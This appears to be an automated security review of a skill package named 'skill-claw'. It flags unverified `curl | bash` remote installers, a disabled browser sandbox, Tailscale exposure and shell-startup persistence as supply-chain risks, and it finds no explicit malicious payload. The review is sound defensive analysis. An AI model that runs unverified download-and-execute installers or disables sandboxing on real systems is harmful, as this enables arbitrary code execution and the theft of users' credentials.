skill-claw

No clear evidence of intentional malware/backdoors/exfiltration is present in the provided fragment itself; it is primarily operational documentation. However, it repeatedly executes remote scripts directly via `curl | bash/sh` without demonstrating integrity verification, creating a significant supply-chain execution risk at provisioning time if upstream endpoints or transport were compromised. Additionally, it disables the browser sandbox (`noSandbox: true`), increasing exploit impact if the browser automation processes malicious content. Tailscale service publishing expands the reachable attack surface of the service behind localhost:18789 for VPN users. Strongly recommended mitigations: pin and verify installer artifacts (checksums/signatures), avoid direct `curl | bash` where possible, validate/limit permissions on the persistence mount, and reconsider browser sandbox disablement or compensate with additional isolation controls.

No direct malicious behavior (exfiltration, keylogging, cryptomining, or backdoor logic) is evidenced in the provided snippet because it is installation/admin documentation rather than Gateway source code. However, the fragment presents a significant supply-chain risk pattern: executing an unaudited remote installer via `curl ... | bash`, combined with optional persistence through a launchd LaunchAgent. Actual malware likelihood cannot be confirmed without reviewing the fetched installer script and the installed Gateway/runtime implementation.

No explicit malicious payload (e.g., credential theft, data exfiltration, backdoor persistence beyond normal shell configuration) is present in the shown code. However, the script has significant supply-chain risk: it performs direct remote code execution via `curl ... | sh` / `curl ... | bash` for zoxide and atuin, installs and runs third-party code via git clone and an fzf installer, and persists future execution by injecting `.zshrc` content that uses `eval` on dynamic initialization output from those tools. If any upstream content or download endpoints are compromised, this module could enable arbitrary code execution on the user’s machine both at install time and on every new zsh session.

Suspicious. The skill’s admin capabilities mostly match its stated purpose, but it combines broad host-control instructions with automatic activation and unverified download-execute install paths. Because an unverifiable OpenClaw installer/CLI is expected to handle stored credentials and bot tokens, the supply-chain and credential-forwarding risk is high even without direct evidence of malicious exfiltration.